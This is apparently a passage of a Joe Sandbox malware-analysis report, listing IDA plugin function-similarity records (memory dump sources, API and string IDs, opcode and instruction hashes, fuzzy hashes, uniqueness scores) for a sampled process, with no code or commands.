                                                                                      • Instruction Fuzzy Hash: 63314376A10719DFCB24DF29DC40BAEB7B8EB44610F444955E859E7240EB309A848BA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID: __aulldvrm
                                                                                      • String ID: +$-
                                                                                      • API String ID: 1302938615-2137968064
                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction ID: e571c8a113a3ae55438582b04446b1124a4953f2e62edd2610200d7511d9cd38
                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                      • Instruction Fuzzy Hash: 0391D271E002169BDF34DE69C881ABEF7A5FF4E320F58461AE875EB2C4D73099818750
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.2176003269.0000000003160000.00000040.00001000.00020000.00000000.sdmp, Offset: 03160000, based on PE: true
                                                                                      • Associated: 00000005.00000002.2176003269.0000000003289000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.000000000328D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000005.00000002.2176003269.00000000032FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_3160000_replace.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$@
                                                                                      • API String ID: 0-1194432280
                                                                                      • Opcode ID: b43dcfd720f30f74cb3d1ac2c12a4b751b7d85d4a3d9fe280fa58de3b9d3c722
                                                                                      • Instruction ID: a2e550c54b1a7294cf3345efde63eafd8924de19dec2adf4f14242849a5d3596
                                                                                      • Opcode Fuzzy Hash: b43dcfd720f30f74cb3d1ac2c12a4b751b7d85d4a3d9fe280fa58de3b9d3c722
                                                                                      • Instruction Fuzzy Hash: 2D812875D002699BDB35DB54CC44BEEB7B8AF08710F0445EAEA19B7280E7309E85CFA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%